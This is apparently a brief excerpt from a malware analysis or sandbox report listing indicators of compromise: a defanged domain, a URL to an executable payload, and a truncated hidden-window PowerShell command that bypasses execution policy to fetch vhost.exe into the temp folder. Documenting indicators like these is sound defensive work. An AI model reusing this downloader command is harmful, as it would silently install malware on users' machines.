Technical Information
- 'wi##cam.it':80
- http://www.wi##cam.it//wp/web/logs/lol/a.exe
- DNS ASK wi##cam.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden -noprofile -noexit If (test-path $env:TEMP + '\vhost.exe') {Remove-Item $env:TEMP + '\vhost.exe'}; $cli = New-Object System.Net.WebClient; $cli.Hea...' (with hidden window)